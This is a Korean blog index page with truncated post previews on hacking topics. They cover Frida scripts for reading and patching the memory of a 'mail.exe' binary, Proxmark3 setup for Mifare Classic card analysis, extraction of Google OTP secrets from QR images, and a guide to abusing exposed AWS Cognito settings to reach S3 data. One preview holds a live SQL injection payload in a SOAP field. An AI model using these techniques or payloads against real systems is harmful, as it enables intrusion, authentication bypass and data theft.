본문 바로가기

전체 글

(37)
ㅇㅇ 보호되어 있는 글입니다.
ㄷㄷ **결론**: "타입에러 낫 어 펑션" 오류는 JavaScript 문법 문제입니다. Frida JavaScript 환경에 맞게 수정한 스크립트를 제공합니다.## 🛠️ 수정된 안전한 스크립트```pythonimport fridaimport timeimport sysimport osdef fixed_memory_analysis(): mail_exe_path = "mail.exe" # 수정된 JavaScript 코드 (안전한 버전) js_code = """ console.log("=== MAIL.EXE 메모리 분석 시작 ==="); function safeMemoryAnalysis() { try { // 1. 프로세스 기본 정보 ..
Mifare Classic 1. 설치 및 설정의존성 설치:brew install readline qt5 pkgconfig p7zip libusb arm-none-eabi-gcc소스코드 다운로드 및 컴파일:git clone https://github.com/RfidResearchGroup/proxmark3.gitcd proxmark3make clean && make all연결 확인:system_profiler SPUSBDataType | grep -i proxmarkls /dev/tty.usbmodem*2. Proxmark3 실행 및 하드웨어 확인클라이언트 실행:./pm3 -p /dev/tty.usbmodemiceman1하드웨어 상태 확인:hw statushw version3. 카드 분석주파수별 스캔:lf search # 12..
ㅂㅂ ## 핵심 답변**또 다른 JavaScript 함수 오류가 있습니다!** `Memory.writeU8().add()` 체인이나 다른 함수 호출에 문제가 있습니다. 가장 기본적인 형태로 다시 작성하겠습니다.## 확실한 정보### 완전히 단순화된 안전한 코드```pythonimport fridaimport sysimport osexecutable = "mail.exe"if not os.path.exists(executable): print(f"❌ {executable} 파일이 없습니다.") sys.exit(1)try: print(f"🚀 {executable} 실행 중...") device = frida.get_local_device() pid = device.spawn([..
ㄷㄷ ## 핵심 답변**주소는 맞지만 메모리 읽기에서 JavaScript 함수 호출 문제가 있습니다.** 그리고 명령어는 동일합니다 (CMP dword [ebp-8], eax = CMP dword ptr [EBP + local_c], EAX).## 확실한 정보### 명령어 비교 분석- **Frida**: `cmp dword [ebp - 8], eax`- **기드라**: `CMP dword ptr [EBP + local_c], EAX`- **local_c = -8**: 기드라의 local_c는 EBP-8을 의미- **결론**: **동일한 명령어입니다** ✅### 수정된 코드 (JavaScript 오류 해결)```pythonimport fridaimport sysimport osexecutable = "mail...
ㅇㅇ soap:Body> APP_COMMON_USERtEMPpASSWORD USERAPPLICATIONID=ID|APPLICAONID=RUN|EMPNO=USER' AND CONVERT(int,@@version) AND '1'='1|USERPRODUCT=A
ee # QR 이미지에서 Google OTP 정보 추출하기# 필요한 라이브러리 설치# pip install opencv-python pyzbar pillowimport cv2from pyzbar import pyzbarimport urllib.parsedef extract_otp_from_image(image_path): """ 이미지 파일에서 QR 코드를 읽어 OTP 정보 추출 """ try: print(f"이미지 분석 중: {image_path}") # 파일 존재 확인 import os if not os.path.exists(image_path): print("❌ 파일이 존재하지 않습니다.") ..
AWS Cognito # AWS Cognito S3 취약점 완전 가이드## 📝 취약점 개념 요약**한 줄 요약:** 웹사이트에서 노출된 AWS 설정 정보를 이용해 S3 버킷의 민감한 데이터에 무단 접근하는 취약점---## 🎯 1. 공격자는 어떻게 AWS 정보를 알아내는가?### 1.1 웹사이트 소스코드에서 발견**가장 흔한 케이스:**```javascript// main.js 파일에서const awsConfig = { region: 'us-east-1', identityPoolId: 'us-east-1:12345678-1234-1234-1234-123456789012', userPoolId: 'us-east-1_ABC123'};```**발견 방법:**- 웹페이지 우클릭 → "소스 보기"- 개발자 도구(F1..